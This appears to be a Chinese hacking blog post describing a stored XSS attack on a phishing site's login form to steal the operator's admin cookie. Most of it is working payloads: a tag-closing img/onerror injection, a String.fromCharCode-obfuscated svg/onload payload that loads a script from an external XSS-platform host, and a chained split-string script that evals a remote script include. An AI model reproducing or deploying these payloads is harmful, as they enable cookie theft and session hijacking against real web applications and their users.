时间:2023-05-12 03:57:01 | 来源:网站运营
时间:2023-05-12 03:57:01 来源:网站运营
攻破黑市最流行的钓鱼网站(第二弹):上次有人向我反映,我讲的过于快了,不适合菜鸟看,所以这次我写的相对来说比较详细~ 这对于有基础的人来说可能比较煎熬,哈哈。大家秒懂的部分可以跳过~~user=123123112312&password=123123"><img/src=1 onerror=alert("1">//&submit=%E7%99%BB%E5%BD%95
"> 是闭合标签<img/src=1 onerror=alert("1"> 是弹窗//为注释掉后面的语法user=123123112312&password=123123"><style/onload=alert(1)>//&submit=%E7%99%BB%E5%BD%95
这次进到后台查看“><img/src=1/>//
红色的”>部分为闭合前边的标签黄色的// 为注释掉后面的语句<img/src=1/> 这句代码主要就是引用我们XSS平台的代码,主要达到一个盗取对方cookie的效果"><svg/onload=eval((String.fromCharCode(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,115,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,46,116,118,47,88,65,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59)))>//
再次请求数据,把这段payload 放到 password 参数里,<script>z='document'</script> <script>z=z+'.write("'</script> <script>z=z+'<script'</script> <script>z=z+' src=ht'</script> <script>z=z+'tp://xss'</script> <script>z=z+'.sssie'</script> <script>z=z+'.com/F'</script> <script>z=z+'MD27h'</script> <script>z=z+'></sc'</script> <script>z=z+'ript>")'</script> <script>alert(z)</script> <script>eval(z)</script>
逐个放进去即可 然后就拿到了对方的cookie关键词:鱼网,黑市,流行,攻破